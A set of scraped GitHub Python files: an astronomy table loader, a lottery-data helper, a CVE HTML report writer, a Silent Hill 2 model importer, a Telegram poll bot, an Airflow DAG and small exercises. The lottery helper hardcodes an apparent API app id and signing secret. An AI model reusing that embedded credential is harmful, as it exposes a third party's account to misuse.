PosTab._good_fibers\n        self._fiber_type = PosTab._fiber_type\n        self._shape = PosTab._shape\n        self._size = PosTab._size\n\n\ndef loadPosTable(infile):\n    posTab = PositionTable()\n    if \".txt\" in infile:\n        posTab.loadTxtPosTab(infile)\n    elif \".fits\" in infile or \".fit\" in infile:\n        hdu = pyfits.open(infile, memmap=False)\n        found = False\n        for i in range(1, len(hdu)):\n            if hdu[i].header[\"EXTNAME\"].split()[0] == \"POSTABLE\":\n                posTab.loadFitsPosTable(hdu[i])\n                found = True\n        if not found:\n            raise RuntimeError(\n                \"No position table information found in file %s.\" % (infile)\n            )\n    return posTab\n","repo_name":"sdss/lvmdrp","sub_path":"python/lvmdrp/core/positionTable.py","file_name":"positionTable.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"38158827350","text":"# from urllib import request, parse\nimport json\nimport numpy as np\n\n_showapi_appid = '43943'\n_showapi_sign = 'cb8ab2087d7a42e7b2e1a9470659bc42'\n\nurl = 'http://route.showapi.com/44-2'\n\n\ndef randomOpenCode(num):\n    training_set = []\n    for i in range(num):\n        code = np.random.choice(32, 5, replace=False)\n        code = np.append(code, np.random.choice(32, 1, replace=False))\n        training_set.append(code)\n\n    return np.array(training_set)\n\ndef convertDataToY(lists):\n    res = []\n    for now in lists:\n        tmp = np.zeros(32)\n        for i in now:\n            tmp[i] = 1\n        res.append(tmp)\n    return np.array(res)\n\ndef convertYToData(lists):\n    res = []\n    for now in 
lists:\n        # recover the 6 selected numbers from a one-hot row: take the indices of the 6 largest entries\n        code = np.sort(np.argpartition(now, -6)[-6:])\n        res.append(code)\n    return np.array(res)\n\nlist = randomOpenCode(2)\nprint('list:', list)\nafter = convertDataToY(list)\nprint('after:', after)\nback = convertYToData(after)\nprint('back:', back)\n\n# def getData():\n#     send_data = parse.urlencode([\n#         ('showapi_appid', _showapi_appid),\n#         ('showapi_sign', _showapi_sign),\n#         (\"code\", \"ssq\"),\n#         (\"count\", 50)\n#\n#     ])\n#\n#     req = request.Request(url)\n#     try:\n#         response = request.urlopen(req, data=send_data.encode('utf-8'), timeout=10)\n#     except Exception as e:\n#         print(e)\n#\n#     result = response.read().decode('utf-8')\n#     result_json = json.loads(result)\n#     print('result_json data is:', result_json)\n#\n#     results = result_json['showapi_res_body']['result']\n#\n#     train_examples = []\n#     for res in results:\n#         tmp = str.split(res['openCode'], ',')\n#         last_index = len(tmp) - 1\n#\n#         print('tmp', tmp, 'len[tmp] - 1', last_index)\n#         last_codes = str.split(tmp[last_index], '+')\n#         tmp[last_index] = last_codes[0]\n#         tmp.append(last_codes[1])\n#         train_examples.append(np.array(tmp).astype(int))\n#\n#     print('result_json data is:', len(results))\n#     print('train_examples is:', train_examples)\n#\n#     return np.array(train_examples)\n\n","repo_name":"ZQPlantSoftware/quantiative-trading","sub_path":"strategy/cnn-predict-lottery/data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"}
{"seq_id":"33074539138","text":"import os\nfrom cveClass import *\nfrom cpeClass import *\n\n\ndef createFile(path):\n    if not os.path.exists(path):\n        with open(path, 'w') as f:\n            f.write('''<!DOCTYPE html>\n<html>\n<head>\n    <meta charset=\"utf-8\">\n    <title>KcVE</title>\n</head>\n<body>\n\n    <div>\n        <h1>Cve Report</h1>\n    </div>\n''')\n        f.close()\n\n\ndef appendToFile(path, text):\n    file = open(path, 'a')  # Open a file in append mode\n    file.write(text)  # Write some text\n    file.close()  # Close the file\n\n\ndef createCveReport(cveList, path):\n    createFile(path)\n    for i in range(len(cveList)):\n\n        # show cve id and cvss infos\n        cveReport = '<br><h2>' + str(cveList[i].id) + '         CVSS version' + str(\n            cveList[i].version) + '</h2><br>'\n        cveReport += '<br><p>Published Date: ' + cveList[i].publishedDate + '<br>lastModifiedDate: ' + cveList[\n            i].lastModifiedDate + '</p><br>'\n        cveReport += '<br><h3>Description</h3><br>' + cveList[i].description + '<br><br>'\n        cveReport += '<br><h3>CVSS</h3><br>Base Score: ' + str(cveList[i].baseScore) + '<br>Vector String: ' + cveList[\n            i].vectorString + '<br>Exploitability Score: ' + str(cveList[i].exploitabilityScore) + '<br><br>'\n\n        # show all cpes for a cve object\n        cveReport += '<br><h3>Vulnerable CPEs</h3><br>'\n        for j in range(len(cveList[i].cpeList)):\n            cveReport += '<br>'\n            cveReport += '<br>  • vendor:' + cveList[i].cpeList[j].vendor + ' product: ' + \\\n                cveList[i].cpeList[j].product + ' version: ' + cveList[i].cpeList[j].version + '<br>'\n\n            if cveList[i].cpeList[j].minVersion is not None and cveList[i].cpeList[j].maxVersion is not None:\n                cveReport += '<br>  • minVersion:' + cveList[i].cpeList[\n                    j].minVersion + ' maxVersion:' + \\\n                    cveList[i].cpeList[j].maxVersion + '<br>'\n            elif cveList[i].cpeList[j].minVersion is not None:\n                cveReport += '<br>  • minVersion:' + cveList[i].cpeList[j].minVersion + '<br>'\n            elif cveList[i].cpeList[j].maxVersion is not None:\n                cveReport += '<br>  • maxVersion:' + cveList[i].cpeList[j].maxVersion + '<br>'\n            cveReport += '<br>'\n\n        # show the source and url reference\n        cveReport += '<br><h3>Source</h3><br>' + cveList[i].source + '<br><br>'\n        cveReport += '<br><h3>URL Reference</h3><br>' + cveList[i].urlSource + '<br><br>'\n\n        cveReport += '<hr>
'\n\n appendToFile(path, cveReport)\n","repo_name":"Kccorp/KcVE","sub_path":"outputBuilder.py","file_name":"outputBuilder.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2509992489","text":"# Authors:\n# Laurynas Zubavičius (Sparagas)\n# Rodolfo Nuñez (roocker666)\n#\n# Buffer reading idea:\n# Murugo - https://github.com/Murugo/Misc-Game-Research/blob/main/PS2/Silent%20Hill%202%2B3/Blender/addons/io_sh2_sh3/import_map.py\n#\n# Original scripts:\n# Durik256 - https://forum.xentax.com/viewtopic.php?f=16&t=25765\n\nfrom inc_noesis import *\n\n\ndef registerNoesisTypes():\n handle = noesis.register(\"Silent Hill 2 (PS2)\", \".map\")\n noesis.setHandlerTypeCheck(handle, CheckType)\n noesis.setHandlerLoadModel(handle, LoadModel)\n # noesis.logPopup()\n return 1\n\n\ndef CheckType(data):\n if len(data) < 4:\n return 0\n if data[:4] != b'wwww':\n return 0\n return 1\n\n\ndef LoadModel(data, mdlList):\n bs = NoeBitStream(data)\n ctx = rapi.rpgCreateContext()\n\n def array(type, len):\n data = []\n for i in range(len):\n data.append(type())\n return data\n\n class FileHead:\n def __init__(self):\n self.magic = bs.readBytes(4)\n self.global_block_offs = bs.readUInt()\n self.local_block_offs = bs.readUInt()\n self.unk_raw_block_data_parms_offs = bs.readUInt()\n self.local_tex_index_offs = array(bs.readUInt, 3)\n self.local_tex_pal_offs = array(bs.readUInt, 3)\n self.local_tex_count = bs.readUInt()\n self.global_tex_count = bs.readUByte()\n self.trans_tex_count = bs.readUByte()\n self.unk_div_flg = bs.readUByte()\n self.unk_padc = bs.readUByte()\n\n class UnkRawBlockDataParms:\n def __init__(self):\n self.matrix_TRS_maybe = array(bs.readFloat, 12)\n self.unk = array(bs.readFloat, 12)\n\n class GlobalBlockHead:\n def __init__(self):\n self.unk_gsregsamount = bs.readUInt()\n self.unk_transamount = bs.readUInt()\n self.unk_gtexnum = bs.readUByte()\n self.unk_gtransnum = bs.readUByte()\n self.pad = array(bs.readUByte, 6)\n\n class LocalBlockHead:\n def __init__(self):\n self.unk_gsregsamount = array(bs.readUShort, 3)\n self.unk_transamount = array(bs.readUShort, 3)\n self.main_mesh_count = bs.readUShort()\n self.pad = array(bs.readUByte, 2)\n\n class MainMeshHead:\n def __init__(self):\n self.mesh_size = bs.readUInt()\n self.next_mesh_offs = bs.readUInt()\n self.tex_data_offs = bs.readUInt()\n self.sub_mesh_count = bs.readUByte()\n self.trans_count = bs.readUByte()\n self.unk_eop_flg = bs.readUByte()\n self.unk_tr_flg = bs.readUByte()\n self.unk_fmt = array(bs.readUByte, 16)\n self.unk_trans = array(bs.readUByte, 16)\n\n class SubMeshHead:\n def __init__(self):\n self.unk_gsregs_count = bs.readUShort()\n self.unk_trans_flg = bs.readUByte()\n self.unk_eop_flg = bs.readUByte()\n self.next_submesh_offs = bs.readUInt()\n self.sub_mesh_index = bs.readUShort()\n self.unk_tcc = bs.readUByte()\n self.unk_tfx = bs.readUByte()\n self.unk_abe = bs.readUByte()\n self.pad = array(bs.readUByte, 3)\n # it ends here in debug\n self.unkF = bs.readFloat()\n self.unkF = bs.readFloat()\n self.unk = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.size_plus144 = bs.readUInt()\n self.unk = bs.readUInt()\n self.vert_count = bs.readUShort()\n self.unk = bs.readUShort()\n self.size_plus112 = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUShort()\n self.unk = 
bs.readUShort()\n self.pad_zero = array(bs.readUByte, 96)\n\n class VertAttr:\n def __init__(self):\n self.vp_x = bs.readUShort()\n self.vp_y = bs.readUShort()\n self.vp_z = bs.readUShort()\n self.vn_vcol_x = bs.readUShort()\n self.vt_u = bs.readUShort()\n self.vt_v = bs.readUShort()\n self.vn_vcol_y = bs.readUShort()\n self.vn_vcol_z = bs.readUShort()\n\n file_head = FileHead()\n bs.seek(file_head.unk_raw_block_data_parms_offs)\n unk_raw_block_data_parms = UnkRawBlockDataParms()\n\n if file_head.global_block_offs:\n\n bs.seek(file_head.global_block_offs)\n global_block_head = GlobalBlockHead()\n main_mesh_head = MainMeshHead()\n\n for s in range(main_mesh_head.sub_mesh_count):\n\n sub_mesh_head = SubMeshHead()\n\n rapi.rpgSetName('global_{}'.format(s))\n vbuf = b''\n ibuf = b''\n vnbuf = b''\n uvbuf = b''\n vcolbuf = b''\n reverse = False\n\n # vert_attr = array(VertAttr, sub_mesh_head.vert_count)\n\n for i in range(sub_mesh_head.vert_count):\n\n # vp_x = bs.readUShort()\n # vp_y = bs.readUShort()\n # vp_z = bs.readUShort()\n vbuf += bs.readBytes(6)\n vn_vcol_x = bs.readUShort()\n vt_u = bs.readUShort() # uv_flag[]\n vt_v = bs.readUShort() # uv_flag[]\n vn_vcol_y = bs.readUShort()\n vn_vcol_z = bs.readUShort()\n\n uv_flag = [vt_u, vt_v]\n vn_vcol = (vn_vcol_x, vn_vcol_y, vn_vcol_z)\n\n uvbuf += NoeVec3([uv_flag[0] / 0x8000, 1.0 - uv_flag[1] / 0x8000, 0]).toBytes()\n vnbuf += NoeVec3([(v & ~0x3F) / -0x8000 for v in vn_vcol]).normalize().toBytes()\n vcolbuf += NoeVec3([(v & 0x3F) / 0x20 for v in vn_vcol]).toBytes()\n\n flag = uv_flag[0] & 0x1\n if not flag:\n if reverse:\n ibuf += struct.pack('3H', i, i - 1, i - 2)\n else:\n ibuf += struct.pack('3H', i - 2, i - 1, i)\n reverse = not reverse\n rapi.rpgBindPositionBuffer(vbuf, noesis.RPGEODATA_SHORT, 6)\n rapi.rpgBindNormalBuffer(vnbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindUV1Buffer(uvbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindColorBuffer(vcolbuf, noesis.RPGEODATA_FLOAT, 12, 3)\n rapi.rpgCommitTriangles(ibuf, noesis.RPGEODATA_USHORT, len(ibuf) // 2, noesis.RPGEO_TRIANGLE)\n\n mdl = rapi.rpgConstructModel()\n bs.seek(sub_mesh_head.next_submesh_offs)\n\n if file_head.local_block_offs:\n\n bs.seek(file_head.local_block_offs)\n local_block_head = LocalBlockHead()\n\n for i in range(local_block_head.main_mesh_count):\n\n main_mesh_head = MainMeshHead()\n\n next_submesh_offs = bs.getOffset()\n for j in range(main_mesh_head.sub_mesh_count):\n sub_mesh_head = SubMeshHead()\n\n rapi.rpgSetName('local_{}_{}'.format(i, j))\n vbuf = b''\n ibuf = b''\n vnbuf = b''\n uvbuf = b''\n vcolbuf = b''\n reverse = False\n for i in range(sub_mesh_head.vert_count):\n vbuf += bs.readBytes(6)\n vn_vcol_x = bs.readShort()\n uv_flag = [bs.readShort(), bs.readShort()]\n vn_vcol = (vn_vcol_x, bs.readShort(), bs.readShort())\n uvbuf += NoeVec3([uv_flag[0] / 0x8000, 1.0 - uv_flag[1] / 0x8000, 0]).toBytes()\n vnbuf += NoeVec3([(v & ~0x3F) / -0x8000 for v in vn_vcol]).normalize().toBytes()\n vcolbuf += NoeVec3([(v & 0x3F) / 0x20 for v in vn_vcol]).toBytes()\n flag = uv_flag[0] & 0x1\n if not flag:\n if reverse:\n ibuf += struct.pack('3H', i, i - 1, i - 2)\n else:\n ibuf += struct.pack('3H', i - 2, i - 1, i)\n reverse = not reverse\n rapi.rpgBindPositionBuffer(vbuf, noesis.RPGEODATA_SHORT, 6)\n rapi.rpgBindNormalBuffer(vnbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindUV1Buffer(uvbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindColorBuffer(vcolbuf, noesis.RPGEODATA_FLOAT, 12, 3)\n rapi.rpgCommitTriangles(ibuf, noesis.RPGEODATA_USHORT, len(ibuf) // 2, 
noesis.RPGEO_TRIANGLE)\n\n mdl = rapi.rpgConstructModel()\n bs.seek(sub_mesh_head.next_submesh_offs)\n bs.seek(main_mesh_head.next_mesh_offs)\n mdlList.append(mdl)\n return 1\n","repo_name":"Sparagas/Silent-Hill","sub_path":"Noesis - Python Plugins/fmt_sh2_ps2_map.py","file_name":"fmt_sh2_ps2_map.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"27533117706","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport telepot\nimport logging\nimport argparse\nfrom telepot.delegate import pave_event_space, per_chat_id, create_open, include_callback_query_chat_id\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\n\n\"\"\"\nPython 3.5.2\nA Python bot for casting polls: the users who adds the bot to a group acts as the administrator and\nis the only one capable of starting and stopping polls\n\"\"\"\n\ntotalitario = {}\nsondaggi = {}\nwith open('groups.json', 'r') as f:\n\tgroups = json.load(f)\n\n# Deafults\nLOG_FILENAME = './Pollbot.log'\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.INFO,format='%(asctime)s %(levelname)-8s %(message)s')\n\n# Define and parse command line arguments\nparser = argparse.ArgumentParser(description=\"My simple Python Telegram bot\")\nparser.add_argument(\"-l\", \"--log\", help=\"file to write log to (default '\" + LOG_FILENAME + \"')\")\nparser.add_argument(\"-T\", \"--TOKEN\", help=\"bot TOKEN identifier\")\n\n# If the log file is specified on the command line then override the default\nargs = parser.parse_args()\nif args.log:\n LOG_FILENAME = args.log\nif args.TOKEN:\n TOKEN = args.TOKEN\nelse:\n logging.error('No TOKEN specified')\n print(\"You must specify the bot's TOKEN\")\n sys.exit(0)\n\nlogger = logging.getLogger(__name__)\n\n# Make a class we can use to capture stdout and sterr in the log\nclass MyLogger(object):\n def __init__(self, logger, level):\n #Needs a logger and a logger level.\n self.logger = logger\n self.level = level\n\n def write(self, message):\n # Only log if there is a message (not just a new line)\n if message.rstrip() != \"\":\n self.logger.log(self.level, message.rstrip())\n\n# Replace stdout with logging to file at INFO level\n#sys.stdout = MyLogger(logger, logging.INFO)\n# Replace stderr with logging to file at ERROR level\nsys.stderr = MyLogger(logger, logging.ERROR)\n\n#Record everyone that writes to your bot\ndef chatter(msg):\n first_name = msg['from']['first_name']\n from_id = msg['from']['id']\n content_type, chat_type, chat_id = telepot.glance(msg)\n try:\n if msg['from']['username']:\n user_name = msg['from']['username']\n if chat_type == 'private':\n person = user_name + ': ' + str(from_id)\n elif chat_type == 'group' or chat_type == 'supergroup':\n group_name = msg['chat']['title']\n person = user_name + ': ' + str(from_id) + ' @ ' + group_name + ', ' + str(chat_id)\n except KeyError:\n if chat_type == 'private':\n person = 'No username - ' + str(first_name) + ': ' + str(from_id)\n elif chat_type == 'group' or chat_type == 'supergroup':\n group_name = msg['chat']['title']\n person = 'No username - ' + str(first_name) + ': ' + str(from_id) + ' @ ' + group_name + ', ' + str(chat_id)\n with open(\"./contatti.txt\", \"a\") as myfile:\n myfile.write(person + '\\n')\n\n#Per-chat class handler: every chat has its own variable space and keeps track of its poll\nclass MessageCounter(telepot.helper.ChatHandler):\n global groups\n def __init__(self, *args, **kwargs):\n 
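# telepot creates one MessageCounter per chat id (see the per_chat_id/pave_event_space wiring at the bottom of this file), so all poll state initialized below is chat-local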
super(MessageCounter, self).__init__(*args, **kwargs)\n        self._poll_of_the_day = None\n        self._markup = None\n        self._message_with_inline_keyboard = None\n        self._risultati = {}\n        self._votanti = {}\n        self._msg_idf = None\n        self._owner = None\n\n    def exitpoll(self, msg, chat_id, from_id, chat_type):\n        if self._owner is None:\n            self.sender.sendMessage('No ongoing poll')\n        elif (chat_type == 'group' or chat_type == 'supergroup') and from_id == self._owner:\n            try:\n                exit_poll = self._poll_of_the_day + '\\n'\n                for e in self._risultati.keys():\n                    exit_poll += e + ': ' + str(self._risultati[e]) + '\\n'\n                self.sender.sendMessage(exit_poll)\n                self._poll_of_the_day = None\n                self._risultati = {}\n                self._markup = None\n                self._votanti = {}\n                self._message_with_inline_keyboard = None\n                logging.info('Poll closed in group %s', msg['chat']['title'])\n            except TypeError:\n                self.sender.sendMessage('No ongoing poll')\n        elif (chat_type == 'group' or chat_type == 'supergroup') and from_id != self._owner:\n            self.sender.sendMessage('Only the Great Master can put an end to an ongoing poll')\n        elif chat_type == 'private':\n            self.sender.sendMessage('You need to be in a group to stop a poll')\n\n    def ongoing(self, chat_id, chat_type, from_id):\n        if chat_type == 'group' or chat_type == 'supergroup':\n            try:\n                self._message_with_inline_keyboard = self.sender.sendMessage(self._poll_of_the_day, reply_markup=sondaggi[(str(chat_id), from_id)][1])\n            except telepot.exception.TelegramError:\n                self.sender.sendMessage('No poll set')\n        else:\n            self.sender.sendMessage('There cannot be polls outside groups')\n\n    def dest(self, msg, chat_type, from_id):\n        if chat_type == 'private':\n            buttons = []\n            element = [x for x in groups.keys() if groups[x][1] == from_id]\n            for e in element:\n                buttons.append([InlineKeyboardButton(text=e, callback_data=str(groups[e][0]))])\n            contacts = InlineKeyboardMarkup(inline_keyboard=buttons)\n            self.sender.sendMessage('Who have you created this poll for?', reply_markup=contacts) if len(element) != 0 else self.sender.sendMessage('You have to add me to a group first')\n        else:\n            self.sender.sendMessage('Poll destinations have to be voted on in the Great High Council')\n\n    def poll(self, msg, chat_id, chat_type, from_id):\n\n        if chat_type == 'group' or chat_type == 'supergroup':\n            global sondaggi\n            try:\n                if (str(chat_id), from_id) in sondaggi.keys():\n                    self._owner = from_id\n                    self._poll_of_the_day = sondaggi[(str(chat_id), from_id)][0]\n                    self._message_with_inline_keyboard = self.sender.sendMessage(self._poll_of_the_day, reply_markup=sondaggi[(str(chat_id), from_id)][1])\n                    self._risultati = totalitario[str(chat_id)]\n                    del totalitario[str(chat_id)]\n                    logging.info('Poll started in group %s', msg['chat']['title'])\n                else:\n                    self.sender.sendMessage('Only the Great Master of the Council can hold a poll')\n            except telepot.exception.TelegramError:\n                self.sender.sendMessage('No poll set')\n        elif chat_type == 'private':\n            lista = msg['text'].split(' . 
')\n if len(lista) == 1:\n self.sender.sendMessage('No choices specified: poll not set')\n logging.info('Wrong request syntax')\n elif len(lista) > 1:\n self._poll_of_the_day = lista[0][6:]\n del lista[0]\n self._risultati = {}\n# logging.info('Poll set: %s', self._poll_of_the_day, lista)\n logging.info('Poll set')\n\n buttons = []\n for e in lista:\n self._risultati[e] = 0\n buttons.append([InlineKeyboardButton(text=e + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self.sender.sendMessage('Poll set, only one choice possible') if len(lista) == 1 else self.sender.sendMessage('Poll set')\n \n \n def scrutatore(self, msg, data, from_id, query_id):\n try:\n if from_id not in self._votanti.keys():\n self._risultati[data] += 1\n self._votanti[from_id] = data\n bot.answerCallbackQuery(query_id, text=data + ': ' + str(self._risultati[data]))\n buttons = []\n for e in self._risultati.keys():\n buttons.append([InlineKeyboardButton(text=str(e) + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self._msg_idf = telepot.message_identifier(self._message_with_inline_keyboard)\n logging.info('One vote from group')\n# print(self._poll_of_the_day)\n bot.editMessageText(self._msg_idf, self._poll_of_the_day, reply_markup=self._markup)\n else:\n if self._votanti[from_id] == data:\n bot.answerCallbackQuery(query_id, text=msg['from']['username'] + ' has already cast his vote')\n else:\n self._risultati[data] += 1\n self._risultati[self._votanti[from_id]] -= 1\n self._votanti[from_id] = data\n bot.answerCallbackQuery(query_id, text=data + ': ' + str(self._risultati[data]))\n buttons = []\n for e in self._risultati.keys():\n buttons.append([InlineKeyboardButton(text=str(e) + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self._msg_idf = telepot.message_identifier(self._message_with_inline_keyboard)\n logging.info('One vote from group')\n bot.editMessageText(self._msg_idf, self._poll_of_the_day, reply_markup=self._markup)\n except (ValueError, KeyError):\n bot.answerCallbackQuery(query_id, text='Poll closed')\n\n\n def on_callback_query(self, msg):\n global sondaggi\n global totalitario\n\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n try:\n if int(data) < 0:\n totalitario[str(data)] = self._risultati\n sondaggi[data, from_id] = [self._poll_of_the_day, self._markup]\n logging.info('Destination chosen: %s', str(data))\n self.bot.answerCallbackQuery(query_id, text='All set')\n self.sender.sendMessage('All set')\n else:\n self.scrutatore(msg, data, from_id, query_id)\n except ValueError:\n self.scrutatore(msg, data, from_id, query_id)\n\n\n def help(self, chat_type):\n if chat_type == 'private':\n self.sender.sendMessage('This bot can hold polls in groups you\\'re in.\\nSend the poll in private chat using the command /poll with this syntax: \\n/poll Question . Choice 1 . Choice 2 . etc\\nNB: To separate question and choices you must type \\' . \\' , i.e. 
\\'*space dot space*\\'\\nNext use \\'/dest\\' to choose from a list of groups you\\'ve added this bot to.\\nWhile you are in a group, you can send /poll to start a poll, /ongoing to show the current poll, or /exitpoll to terminate it.', parse_mode='HTML')\n        else:\n            self.sender.sendMessage('You have to be in a private chat to ask for help')\n\n    def on_chat_message(self, msg):\n        global groups\n        chatter(msg)\n        content_type, chat_type, chat_id = telepot.glance(msg)\n        from_id = msg['from']['id']\n        logging.info('Message content: %s', content_type)\n        logging.info('Chat type: %s', chat_type)\n        if content_type == 'new_chat_member':\n            groups[msg['chat']['title']] = [chat_id, from_id]\n            with open('groups.json', 'w') as json_file:\n                json.dump(groups, json_file, sort_keys=True, indent=4, separators=(',', ': '))\n            logging.info('Added to %s', msg['chat']['title'])\n        elif content_type == 'left_chat_member' and msg['left_chat_member']['id'] == 287100649:  # presumably this bot's own account id\n            del groups[msg['chat']['title']]\n            with open('groups.json', 'w') as json_file:\n                json.dump(groups, json_file, sort_keys=True, indent=4, separators=(',', ': '))\n            logging.info('Removed from %s', msg['chat']['title'])\n        elif content_type == 'text':  # only dispatch commands for plain text messages\n            text = msg['text'].replace(bot_name, '')\n            logging.info('Text: %s', text)\n            if text[:5] == '/poll':\n                self.poll(msg, chat_id, chat_type, from_id)\n            elif text == '/dest':\n                self.dest(msg, chat_type, from_id)\n            elif text == '/ongoing':\n                self.ongoing(chat_id, chat_type, from_id)\n            elif text == '/exitpoll':\n                self.exitpoll(msg, chat_id, from_id, chat_type)\n            elif text == '/help' or text == '/start':\n                self.help(chat_type)\n\n\n#TOKEN = sys.argv[1] # get token from command-line\n\nbot = telepot.DelegatorBot(TOKEN, [\n    include_callback_query_chat_id(pave_event_space())(\n        per_chat_id(), create_open, MessageCounter, timeout=86400),\n])\nbot_name = '@' + bot.getMe()['username']\nlogging.info('Bot started')\nbot.message_loop(run_forever='Listening ...')\n\n","repo_name":"96Octavian/Pollbot","sub_path":"Pollbot_dist.py","file_name":"Pollbot_dist.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"32407876342","text":"import utils.airflow_features as Features\nimport utils.data_lake_helper as dl_helper\nfrom functools import partial\n\nimport airflow\nfrom airflow import DAG\nfrom airflow.models import Variable\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\n\nfrom features_utils import get_main_df\n\nmain_path = None\ndata_lake = None\nfile_extension = None\n\ndef init(main_path_, data_lake_, file_extension_):\n\tglobal main_path\n\tglobal data_lake\n\tglobal file_extension\n\t\n\tmain_path = main_path_\n\tdata_lake = data_lake_\n\tfile_extension = file_extension_\n\n\ndef fit_vector(vector):\n    f_name = 'text_normalized'\n    df = get_main_df()\n    df[f_name] = data_lake.load_obj(f_name + '.pkl')\n    train_x = df[df.path == (main_path + 'train_set/')][f_name]\n    valid_x = df[df.path == (main_path + 'test_set/')][f_name]\n\n    vector.model.fit(df[f_name])\n    xtrain_v = vector.transform(train_x)\n    xvalid_v = vector.transform(valid_x)\n\n    #saving matrices\n    data_lake.save_npz(xvalid_v, vector.xvalid_name + \".npz\")\n    data_lake.save_npz(xtrain_v, vector.xtrain_name + \".npz\")\n    data_lake.save_obj(vector, vector.name + \".pkl\")\n\n\ndef vector_extr_sub_dag(parent_dag_name, child_dag_name, args, schedule_interval):\n\n\tvectors = 
[]\n\tvectors.append(Features.MyCountVectorizer(config=data_lake.load_config('count_vect_config.txt')))\n\tvectors.append(Features.MyWordTfidfVectorizer(config=data_lake.load_config('tf_idf_word_vect_config.txt')))\n\tvectors.append(Features.MyNGramTfidfVectorizer(config=data_lake.load_config('tf_idf_n_gram_vect_config.txt')))\n\tvectors.append(Features.MyCharTfidfVectorizer(config=data_lake.load_config('tf_idf_char_vect_config.txt')))\n\t\n\tdag = DAG('%s.%s' % (parent_dag_name, child_dag_name),\n\t\t\tdefault_args=args,\n\t\t\tstart_date=args['start_date'],\n\t\t\tmax_active_runs=1)\n\n\tstart = DummyOperator(task_id=\"start\", dag=dag)\n\n\tfeature_nodes = []\n\tfor vector in vectors:\n\n\t    fnode = PythonOperator(\n\t        task_id= 'get_' + vector.name,\n\t        python_callable=partial(fit_vector, vector),\n\t        dag=dag)\n\n\t    feature_nodes.append(fnode)\n\n\tstart >> feature_nodes\n\n\treturn dag\n","repo_name":"nbuzzano/nlp-text-classification","sub_path":"dags/preprocessing/vector_features.py","file_name":"vector_features.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"31147245691","text":"\"\"\"Write a program that reads in a text file, infile.txt and writes to an\r\noutput file, outfile.txt. Your program should write all the lines in\r\ninfile.txt that have more than 15 characters to outfile.txt in all upper case.\r\"\"\"\r\n\r\nfileref = open(\"infile.txt\",'r')\r\n\r\noutfile = open(\"outfile.txt\",'w')\r\n\r\nfor line in fileref:\r\n    if len(line) > 15:\r\n        # the exercise asks for upper-case output, so convert each qualifying line\r\n        outfile.write(line.upper())\r\n\r\nfileref.close()\r\noutfile.close()\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/Fall2013/Q_7.py","file_name":"Q_7.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1127066089","text":"from gpiozero import DigitalOutputDevice \nfrom guizero import App, PushButton\n\npin = DigitalOutputDevice(18)\n\ndef start():\n    start_button.disable()\n    stop_button.enable()\n    pin.on()\n\ndef stop():\n    start_button.enable()\n    stop_button.disable()\n    pin.off()\n\napp = App(width=100, height=150)\nstart_button = PushButton(app, command=start, text=\"On\")\nstart_button.text_size = 30\nstop_button = PushButton(app, command=stop, text=\"Off\", enabled=False)\nstop_button.text_size = 30\napp.display()\n","repo_name":"simonmonk/raspberrypi_cookbook_ed3","sub_path":"python/ch_10_gui_switch.py","file_name":"ch_10_gui_switch.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"}
{"seq_id":"43305693113","text":"#\n# @lc app=leetcode id=543 lang=python\n#\n# [543] Diameter of Binary Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\nclass TreeNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nclass Solution(object):\n    def diameterOfBinaryTree(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        self.max = 0\n        self.dfs(root)\n        return self.max\n\n    def dfs(self, root):\n        if not root:\n            return -1\n        left = self.dfs(root.left) + 1\n        right = self.dfs(root.right) + 1\n        self.max = max(left + right, self.max)\n        return max(left, right)\n\n\n# root = TreeNode(1)\n# root.left = TreeNode(2)\n# root.left.left = TreeNode(4)\n# root.left.right = TreeNode(5)\n# root.right = TreeNode(3)\n# print(Solution().diameterOfBinaryTree(root))\n\n# @lc 
